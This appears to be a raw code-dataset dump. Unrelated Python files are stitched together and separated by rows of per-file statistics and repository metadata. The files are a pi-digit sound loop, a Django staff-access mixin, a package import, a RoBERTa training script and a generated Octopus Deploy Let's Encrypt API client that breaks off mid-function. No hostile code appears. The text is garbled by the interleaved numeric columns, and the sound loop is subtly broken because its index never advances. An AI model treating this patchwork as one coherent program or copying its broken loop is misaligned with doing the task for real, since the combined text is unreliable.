29166298666078308906811879009081529506362678207561438881578135113469536630387841209234694286873083932043233387277549680521030282154432472338884521534372725012858974769146080831440412586818154004918777228786980185345453700652665564917091542952275670922221747411206272065662298980603289167206874365494824610869736722554740481288924247185432360575341167285075755205713115669795458488739874222813588798584078313506054829055148278529489112190538319562422871948475940785939804790109419407067176443903273071213588738504999363883820550168340277749607027684488028191222063688863681104356952930065219552826152699127163727738841899328713056346468822739828876319864570983630891778648708667618548568004767255267541474285102814580740315299219781455775684368111018531749816701642664788409026268282444825802753209454991510451851771654631180490456798571325752811791365627815811128881656228587603087597496384943527567661216895926148503078536204527450775295063101248034180458405943292607985443562009370809182152392037179067812199228049606973823874331262673030679594396095495718957721791559730058869364684557667609245090608820221223571925453671519183487258742391941089044411595993276004450655620646116465566548759424736925233695599303035509581762617623184956190649483967300203776387436934399982943020914707361894793269276244518656023955905370512897816345542332011497599489627842432748378803270141867695262118097500640514975588965029300486760520801049153788541390942453169171998762894127722112946456829486028149318156024967788794981377721622935943781100444806079767242927624951078415344642915084276452000204276947069804177583220909702029165734725158290463091035903784297757265172087724474095226716630600546971638794317119687348468873818665675127929857501636341131462753049901913564682380432997069577015078933772865803571279091376742080565549362464641260024379684543777339026472512819416320076848736251764065967540693621758879307855916478777274739272002910342949562447661308200729250734529170764226621047673037863169954237455117456522022783324096803524667663190861011206745856287317413511162292078865132941244815471628182079877168346341322362234117788231027659825109358892359162055108763298087993165172528938001237817434896832151590562493347370206832232100118637395770567473867102173212375224325241626358034376253606808669163571594551527817803921774322823436633772811186390511893075901666650742952758384008544635419317190531363659724905158409106582201814734799022359067138146905116051922301269482316113417439944714833040862484269139502336713412425123864026657258130943967621939655407386524229897879782198637918299709557924747320303239116410445906907977862315518349593035305923789817515891457650408025109479123421758482841881950138546165680301755035580054944894884871351605375593402345748979516602442338321406030095937105588457052515704266284600354402823678768550982678161765520375795655481677896038927498355608791541177749423573400764161093294003899982199267257086957326068774974224802023307525187650255968420760693229988587579898896460744381788170081548895226516722834045277219106991415764639485231126794730865803195076455197675628957428881796812090026387145257858315277615109088631740243695680567873015235427804793414266495223833707117511265375503942372098784668049139473446530714079622597287130503077258714875570502582573466866613802351426056116197405543436548698005444879295970287590352258409782683598666446586045694241390729095266249932902973440568160683805726626057277088407073471496060064561454070734432782514087474275506722304845357006092214390002992981608211717047917614505191008132670375214930740567853311106058352912781007391749949197845112915913681107394055175208019630539350740248509553772500367054665162330430425087442324262404632115078997336929985407041656261041976700202415094892411856092409637604429612002364590706449770627207919019235964807048923636979860198283087284228564752353162882791324295524814447505521909672046080689545181712204930321853740627247421519740305769043602686360780792004776232429551829473522027244376339027721392087767065716241639751785859254426923428535274328856336850789651962072519416556061870370550218462845434257850383000095374518292958440464918838685793483961151297160581665745096703677495836666693121'
while True:
sound=str(pi[i])
winsound.PlaySound(sound, winsound.SND_FILENAME)
| 12,822.5
| 102,403
| 0.999474
| 28
| 102,580
| 3,661.607143
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.998537
| 0.000302
| 102,580
| 7
| 102,404
| 14,654.285714
| 0.001229
| 0
| 0
| 0
| 0
| 0
| 0.998586
| 0.998284
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
8e4b88e62a8eedfba02a02f71f8c2a7d0e3cfa42
| 254
|
py
|
Python
|
codershq/challenge/mixin.py
|
saeedhassan/CodersHQ
|
6c029c8f3f4507d02b6253aae87ec64cf8b7e04b
|
[
"MIT"
] | null | null | null |
codershq/challenge/mixin.py
|
saeedhassan/CodersHQ
|
6c029c8f3f4507d02b6253aae87ec64cf8b7e04b
|
[
"MIT"
] | null | null | null |
codershq/challenge/mixin.py
|
saeedhassan/CodersHQ
|
6c029c8f3f4507d02b6253aae87ec64cf8b7e04b
|
[
"MIT"
] | null | null | null |
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
class AdminStaffRequiredMixin(LoginRequiredMixin, UserPassesTestMixin):
def test_func(self):
return self.request.user.is_superuser or self.request.user.is_staff
| 36.285714
| 78
| 0.822835
| 28
| 254
| 7.357143
| 0.75
| 0.359223
| 0.145631
| 0.165049
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.110236
| 254
| 6
| 79
| 42.333333
| 0.911504
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.5
| 0.25
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 8
|
6d1b8f7571a27ffaa5de8b3c169a6d3d5f99cd1b
| 143
|
py
|
Python
|
tests/TestingHelper/__init__.py
|
rmetcalf9/EllucainEthosPythonClient
|
6913322b1e583f655f67399f2baa763833583c27
|
[
"MIT"
] | 1
|
2021-02-09T22:05:50.000Z
|
2021-02-09T22:05:50.000Z
|
tests/TestingHelper/__init__.py
|
rmetcalf9/EllucainEthosPythonClient
|
6913322b1e583f655f67399f2baa763833583c27
|
[
"MIT"
] | 1
|
2020-07-02T11:44:54.000Z
|
2020-07-02T11:45:38.000Z
|
tests/TestingHelper/__init__.py
|
rmetcalf9/EllucainEthosPythonClient
|
6913322b1e583f655f67399f2baa763833583c27
|
[
"MIT"
] | 1
|
2021-01-13T21:35:11.000Z
|
2021-01-13T21:35:11.000Z
|
from .GenerateSampleResponses import getPersonMockResult, getMimimumResourceMockResult, getPersonNotFoundMockResult, getPersonHoldMockResult
| 35.75
| 140
| 0.909091
| 7
| 143
| 18.571429
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.062937
| 143
| 3
| 141
| 47.666667
| 0.970149
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6d4d71d1d8e78070d5ece21f5c1bb7d089bbd766
| 16,235
|
py
|
Python
|
RoBERTa/train_and_eval.py
|
nlx-group/Commonsense-Reasoning-Neuro-only-vs-Neuro-Symbolic-Methods
|
eba0a333d92b8b8faf09158d0104b5296dfd2e38
|
[
"MIT"
] | 7
|
2021-10-30T03:44:53.000Z
|
2021-11-24T08:18:38.000Z
|
RoBERTa/train_and_eval.py
|
nlx-group/Shortcutted-Commonsense-Reasoning
|
b65de0b5ca54e9baf0db68a1a6e5b51940a65001
|
[
"MIT"
] | null | null | null |
RoBERTa/train_and_eval.py
|
nlx-group/Shortcutted-Commonsense-Reasoning
|
b65de0b5ca54e9baf0db68a1a6e5b51940a65001
|
[
"MIT"
] | null | null | null |
from argparse import Namespace
import logging
import os
from pytorch_lightning import Trainer, seed_everything
from pytorch_lightning.callbacks import ModelCheckpoint, EarlyStopping
from pytorch_lightning.loggers import TensorBoardLogger
from models import (
RobertaForARCT,
RobertaForBinaryARCT,
RobertaForPIQA,
RobertaForMultipleChoicePIQA,
RobertaForARC,
RobertaForRankingARC,
RobertaForCSQA,
)
LOG = logging.getLogger(__name__)
def train_and_eval_binary_arct(
do_train,
do_test,
load_from_checkpoint,
epochs,
learning_rate,
weight_decay,
lr_schedule,
warmup_ratio,
gradient_accumulation_steps,
seed,
model_name,
batch_size,
max_seq_len,
data_path,
log_path,
checkpoint_path,
save_top_k,
use_early_stop,
early_stop_metric,
early_stop_patience,
early_stop_mode,
):
hparams = Namespace(
learning_rate=learning_rate,
gradient_accumulation_steps=gradient_accumulation_steps,
seed=seed,
model_name=model_name,
batch_size=batch_size,
max_seq_len=max_seq_len,
weight_decay=weight_decay,
warmup_ratio=warmup_ratio,
)
seed_everything(hparams.seed)
if load_from_checkpoint is None:
roberta = RobertaForBinaryARCT(
hparams,
data_path=data_path,
epochs=epochs,
lr_schedule=lr_schedule,
num_classes=2,
)
else:
roberta = RobertaForBinaryARCT.load_from_checkpoint(
load_from_checkpoint,
hparams=hparams,
data_path=data_path,
epochs=epochs,
lr_schedule=lr_schedule,
num_classes=2,
)
roberta_name = "Roberta-For-Binary-ARCT"
checkpoint_callback = ModelCheckpoint(
filepath=os.path.join(checkpoint_path, roberta_name + "_{epoch:02d}"),
save_top_k=save_top_k,
monitor="Loss/Validation",
mode="min",
)
logger = TensorBoardLogger(log_path, name=roberta_name)
kwargs = dict()
if hparams.gradient_accumulation_steps:
kwargs["accumulate_grad_batches"] = hparams.gradient_accumulation_steps
if use_early_stop:
kwargs["callbacks"] = [
EarlyStopping(
monitor=early_stop_metric,
patience=early_stop_patience,
mode=early_stop_mode,
)
]
trainer = Trainer(
max_epochs=epochs,
logger=logger,
checkpoint_callback=checkpoint_callback,
gpus=1,
**kwargs
)
if do_train:
LOG.info("Starting training")
trainer.fit(roberta)
if do_test:
LOG.info("Starting testing")
trainer.test(roberta)
def train_and_eval_arct(
do_train,
do_test,
load_from_checkpoint,
epochs,
learning_rate,
weight_decay,
lr_schedule,
warmup_ratio,
gradient_accumulation_steps,
seed,
model_name,
batch_size,
max_seq_len,
data_path,
log_path,
checkpoint_path,
save_top_k,
use_early_stop,
early_stop_metric,
early_stop_patience,
early_stop_mode,
):
hparams = Namespace(
learning_rate=learning_rate,
gradient_accumulation_steps=gradient_accumulation_steps,
seed=seed,
model_name=model_name,
batch_size=batch_size,
max_seq_len=max_seq_len,
weight_decay=weight_decay,
warmup_ratio=warmup_ratio,
)
seed_everything(hparams.seed)
if load_from_checkpoint is None:
roberta = RobertaForARCT(
hparams,
data_path=data_path,
epochs=epochs,
lr_schedule=lr_schedule,
num_classes=2,
)
else:
roberta = RobertaForARCT.load_from_checkpoint(
load_from_checkpoint,
hparams=hparams,
data_path=data_path,
epochs=epochs,
lr_schedule=lr_schedule,
num_classes=2,
)
roberta_name = "Roberta-For-ARCT"
checkpoint_callback = ModelCheckpoint(
filepath=os.path.join(checkpoint_path, roberta_name + "_{epoch:02d}"),
save_top_k=save_top_k,
monitor="Loss/Validation",
mode="min",
)
logger = TensorBoardLogger(log_path, name=roberta_name)
kwargs = dict()
if hparams.gradient_accumulation_steps:
kwargs["accumulate_grad_batches"] = hparams.gradient_accumulation_steps
if use_early_stop:
kwargs["callbacks"] = [
EarlyStopping(
monitor=early_stop_metric,
patience=early_stop_patience,
mode=early_stop_mode,
)
]
trainer = Trainer(
max_epochs=epochs,
logger=logger,
checkpoint_callback=checkpoint_callback,
gpus=1,
**kwargs
)
if do_train:
LOG.info("Starting training")
trainer.fit(roberta)
if do_test:
LOG.info("Starting testing")
trainer.test(roberta)
def train_and_eval_piqa(
do_train,
do_test,
load_from_checkpoint,
epochs,
learning_rate,
weight_decay,
lr_schedule,
warmup_ratio,
gradient_accumulation_steps,
seed,
model_name,
batch_size,
max_seq_len,
data_path,
log_path,
checkpoint_path,
save_top_k,
use_early_stop,
early_stop_metric,
early_stop_patience,
early_stop_mode,
):
hparams = Namespace(
learning_rate=learning_rate,
gradient_accumulation_steps=gradient_accumulation_steps,
seed=seed,
model_name=model_name,
batch_size=batch_size,
max_seq_len=max_seq_len,
weight_decay=weight_decay,
warmup_ratio=warmup_ratio,
)
seed_everything(hparams.seed)
if load_from_checkpoint is None:
roberta = RobertaForPIQA(
hparams,
data_path=data_path,
epochs=epochs,
lr_schedule=lr_schedule,
num_classes=2,
)
else:
roberta = RobertaForPIQA.load_from_checkpoint(
load_from_checkpoint,
hparams=hparams,
data_path=data_path,
epochs=epochs,
lr_schedule=lr_schedule,
num_classes=2,
)
roberta_name = "Roberta-For-PIQA"
checkpoint_callback = ModelCheckpoint(
filepath=os.path.join(checkpoint_path, roberta_name + "_{epoch:02d}"),
save_top_k=save_top_k,
monitor="Loss/Validation",
mode="min",
)
logger = TensorBoardLogger(log_path, name=roberta_name)
kwargs = dict()
if hparams.gradient_accumulation_steps:
kwargs["accumulate_grad_batches"] = hparams.gradient_accumulation_steps
if use_early_stop:
kwargs["callbacks"] = [
EarlyStopping(
monitor=early_stop_metric,
patience=early_stop_patience,
mode=early_stop_mode,
)
]
trainer = Trainer(
max_epochs=epochs,
logger=logger,
checkpoint_callback=checkpoint_callback,
gpus=1,
**kwargs
)
if do_train:
LOG.info("Starting training")
trainer.fit(roberta)
if do_test:
LOG.info("Starting testing")
trainer.test(roberta)
def train_and_eval_mc_piqa(
do_train,
do_test,
load_from_checkpoint,
epochs,
learning_rate,
weight_decay,
lr_schedule,
warmup_ratio,
gradient_accumulation_steps,
seed,
model_name,
batch_size,
max_seq_len,
data_path,
log_path,
checkpoint_path,
save_top_k,
use_early_stop,
early_stop_metric,
early_stop_patience,
early_stop_mode,
):
hparams = Namespace(
learning_rate=learning_rate,
gradient_accumulation_steps=gradient_accumulation_steps,
seed=seed,
model_name=model_name,
batch_size=batch_size,
max_seq_len=max_seq_len,
weight_decay=weight_decay,
warmup_ratio=warmup_ratio,
)
seed_everything(hparams.seed)
if load_from_checkpoint is None:
roberta = RobertaForMultipleChoicePIQA(
hparams,
data_path=data_path,
epochs=epochs,
lr_schedule=lr_schedule,
num_classes=2,
)
else:
roberta = RobertaForMultipleChoicePIQA.load_from_checkpoint(
load_from_checkpoint,
hparams=hparams,
data_path=data_path,
epochs=epochs,
lr_schedule=lr_schedule,
num_classes=2,
)
roberta_name = "Roberta-For-MC-PIQA"
checkpoint_callback = ModelCheckpoint(
filepath=os.path.join(checkpoint_path, roberta_name + "_{epoch:02d}"),
save_top_k=save_top_k,
monitor="Loss/Validation",
mode="min",
)
logger = TensorBoardLogger(log_path, name=roberta_name)
kwargs = dict()
if hparams.gradient_accumulation_steps:
kwargs["accumulate_grad_batches"] = hparams.gradient_accumulation_steps
if use_early_stop:
kwargs["callbacks"] = [
EarlyStopping(
monitor=early_stop_metric,
patience=early_stop_patience,
mode=early_stop_mode,
)
]
trainer = Trainer(
max_epochs=epochs,
logger=logger,
checkpoint_callback=checkpoint_callback,
gpus=1,
**kwargs
)
if do_train:
LOG.info("Starting training")
trainer.fit(roberta)
if do_test:
LOG.info("Starting testing")
trainer.test(roberta)
def train_and_eval_arc(
do_train,
do_test,
load_from_checkpoint,
epochs,
learning_rate,
weight_decay,
lr_schedule,
warmup_ratio,
gradient_accumulation_steps,
seed,
model_name,
batch_size,
max_seq_len,
log_path,
checkpoint_path,
save_top_k,
use_early_stop,
early_stop_metric,
early_stop_patience,
early_stop_mode,
):
hparams = Namespace(
learning_rate=learning_rate,
gradient_accumulation_steps=gradient_accumulation_steps,
seed=seed,
model_name=model_name,
batch_size=batch_size,
max_seq_len=max_seq_len,
weight_decay=weight_decay,
warmup_ratio=warmup_ratio,
)
seed_everything(hparams.seed)
if load_from_checkpoint is None:
roberta = RobertaForARC(
hparams,
epochs=epochs,
lr_schedule=lr_schedule,
num_classes=5,
)
else:
roberta = RobertaForARC.load_from_checkpoint(
load_from_checkpoint,
hparams=hparams,
epochs=epochs,
lr_schedule=lr_schedule,
num_classes=5,
)
roberta_name = "Roberta-For-ARC"
checkpoint_callback = ModelCheckpoint(
filepath=os.path.join(checkpoint_path, roberta_name + "_{epoch:02d}"),
save_top_k=save_top_k,
monitor="Loss/Validation",
mode="min",
)
logger = TensorBoardLogger(log_path, name=roberta_name)
kwargs = dict()
if hparams.gradient_accumulation_steps:
kwargs["accumulate_grad_batches"] = hparams.gradient_accumulation_steps
if use_early_stop:
kwargs["callbacks"] = [
EarlyStopping(
monitor=early_stop_metric,
patience=early_stop_patience,
mode=early_stop_mode,
)
]
trainer = Trainer(
max_epochs=epochs,
logger=logger,
checkpoint_callback=checkpoint_callback,
gpus=1,
**kwargs
)
if do_train:
LOG.info("Starting training")
trainer.fit(roberta)
if do_test:
LOG.info("Starting testing")
trainer.test(roberta)
def train_and_eval_ranking_arc(
do_train,
do_test,
load_from_checkpoint,
epochs,
learning_rate,
weight_decay,
lr_schedule,
warmup_ratio,
gradient_accumulation_steps,
seed,
model_name,
batch_size,
max_seq_len,
log_path,
checkpoint_path,
save_top_k,
use_early_stop,
early_stop_metric,
early_stop_patience,
early_stop_mode,
):
hparams = Namespace(
learning_rate=learning_rate,
gradient_accumulation_steps=gradient_accumulation_steps,
seed=seed,
model_name=model_name,
batch_size=batch_size,
max_seq_len=max_seq_len,
weight_decay=weight_decay,
warmup_ratio=warmup_ratio,
)
seed_everything(hparams.seed)
if load_from_checkpoint is None:
roberta = RobertaForRankingARC(
hparams,
epochs=epochs,
lr_schedule=lr_schedule,
num_classes=5,
)
else:
roberta = RobertaForRankingARC.load_from_checkpoint(
load_from_checkpoint,
hparams=hparams,
epochs=epochs,
lr_schedule=lr_schedule,
num_classes=5,
)
roberta_name = "Roberta-For-Ranking-ARC"
checkpoint_callback = ModelCheckpoint(
filepath=os.path.join(checkpoint_path, roberta_name + "_{epoch:02d}"),
save_top_k=save_top_k,
monitor="Loss/Validation",
mode="min",
)
logger = TensorBoardLogger(log_path, name=roberta_name)
kwargs = dict()
if hparams.gradient_accumulation_steps:
kwargs["accumulate_grad_batches"] = hparams.gradient_accumulation_steps
if use_early_stop:
kwargs["callbacks"] = [
EarlyStopping(
monitor=early_stop_metric,
patience=early_stop_patience,
mode=early_stop_mode,
)
]
trainer = Trainer(
max_epochs=epochs,
logger=logger,
checkpoint_callback=checkpoint_callback,
gpus=1,
**kwargs
)
if do_train:
LOG.info("Starting training")
trainer.fit(roberta)
if do_test:
LOG.info("Starting testing")
trainer.test(roberta)
def train_and_eval_csqa(
do_train,
do_test,
load_from_checkpoint,
epochs,
learning_rate,
weight_decay,
lr_schedule,
warmup_ratio,
gradient_accumulation_steps,
seed,
model_name,
batch_size,
max_seq_len,
log_path,
checkpoint_path,
save_top_k,
use_early_stop,
early_stop_metric,
early_stop_patience,
early_stop_mode,
):
hparams = Namespace(
learning_rate=learning_rate,
gradient_accumulation_steps=gradient_accumulation_steps,
seed=seed,
model_name=model_name,
batch_size=batch_size,
max_seq_len=max_seq_len,
weight_decay=weight_decay,
warmup_ratio=warmup_ratio,
)
seed_everything(hparams.seed)
if load_from_checkpoint is None:
roberta = RobertaForCSQA(
hparams,
epochs=epochs,
lr_schedule=lr_schedule,
num_classes=5,
)
else:
roberta = RobertaForCSQA.load_from_checkpoint(
load_from_checkpoint,
hparams=hparams,
epochs=epochs,
lr_schedule=lr_schedule,
num_classes=5,
)
roberta_name = "Roberta-For-CSQA"
checkpoint_callback = ModelCheckpoint(
filepath=os.path.join(checkpoint_path, roberta_name + "_{epoch:02d}"),
save_top_k=save_top_k,
monitor="Loss/Validation",
mode="min",
)
logger = TensorBoardLogger(log_path, name=roberta_name)
kwargs = dict()
if hparams.gradient_accumulation_steps:
kwargs["accumulate_grad_batches"] = hparams.gradient_accumulation_steps
if use_early_stop:
kwargs["callbacks"] = [
EarlyStopping(
monitor=early_stop_metric,
patience=early_stop_patience,
mode=early_stop_mode,
)
]
trainer = Trainer(
max_epochs=epochs,
logger=logger,
checkpoint_callback=checkpoint_callback,
gpus=1,
**kwargs
)
if do_train:
LOG.info("Starting training")
trainer.fit(roberta)
if do_test:
LOG.info("Starting testing")
trainer.test(roberta)
| 25.015408
| 79
| 0.625624
| 1,719
| 16,235
| 5.524142
| 0.0605
| 0.053075
| 0.092144
| 0.042755
| 0.929549
| 0.929549
| 0.929549
| 0.929549
| 0.929549
| 0.929549
| 0
| 0.003083
| 0.30077
| 16,235
| 648
| 80
| 25.054012
| 0.833421
| 0
| 0
| 0.841837
| 0
| 0
| 0.048845
| 0.01275
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011905
| false
| 0
| 0.011905
| 0
| 0.02381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
edb2d45a01841bd157bb8d42600f465b6e304fa9
| 13,924
|
py
|
Python
|
octopus_deploy_swagger_client/octopus_deploy_client/lets_encrypt_api.py
|
cvent/octopus-deploy-api-client
|
0e03e842e1beb29b132776aee077df570b88366a
|
[
"Apache-2.0"
] | null | null | null |
octopus_deploy_swagger_client/octopus_deploy_client/lets_encrypt_api.py
|
cvent/octopus-deploy-api-client
|
0e03e842e1beb29b132776aee077df570b88366a
|
[
"Apache-2.0"
] | null | null | null |
octopus_deploy_swagger_client/octopus_deploy_client/lets_encrypt_api.py
|
cvent/octopus-deploy-api-client
|
0e03e842e1beb29b132776aee077df570b88366a
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Octopus Server API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 2019.6.7+Branch.tags-2019.6.7.Sha.aa18dc6809953218c66f57eff7d26481d9b23d6a
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from octopus_deploy_swagger_client.api_client import ApiClient
class LetsEncryptApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_get_action(self, **kwargs): # noqa: E501
"""custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_get_action # noqa: E501
Returns the current Let's Encrypt configuration NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_get_action(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_get_action_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_get_action_with_http_info(**kwargs) # noqa: E501
return data
def custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_get_action_with_http_info(self, **kwargs): # noqa: E501
"""custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_get_action # noqa: E501
Returns the current Let's Encrypt configuration NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_get_action_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_get_action" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'api/letsencryptconfiguration', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_update_action(self, **kwargs): # noqa: E501
"""custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_update_action # noqa: E501
Updates the Let's Encrypt configuration used by the Octopus Server. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_update_action(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_update_action_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_update_action_with_http_info(**kwargs) # noqa: E501
return data
def custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_update_action_with_http_info(self, **kwargs): # noqa: E501
"""custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_update_action # noqa: E501
Updates the Let's Encrypt configuration used by the Octopus Server. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_update_action_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_configuration_update_action" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'api/letsencryptconfiguration', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_http_challenge_responder(self, token, **kwargs): # noqa: E501
"""custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_http_challenge_responder # noqa: E501
Returns the computed HTTP challenge for a given token NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_http_challenge_responder(token, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str token: LetsEncrypt response token (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_http_challenge_responder_with_http_info(token, **kwargs) # noqa: E501
else:
(data) = self.custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_http_challenge_responder_with_http_info(token, **kwargs) # noqa: E501
return data
def custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_http_challenge_responder_with_http_info(self, token, **kwargs): # noqa: E501
"""custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_http_challenge_responder # noqa: E501
Returns the computed HTTP challenge for a given token NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_http_challenge_responder_with_http_info(token, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str token: LetsEncrypt response token (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['token'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method custom_action_response_descriptor_octopus_server_web_api_actions_lets_encrypt_http_challenge_responder" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'token' is set
if ('token' not in params or
params['token'] is None):
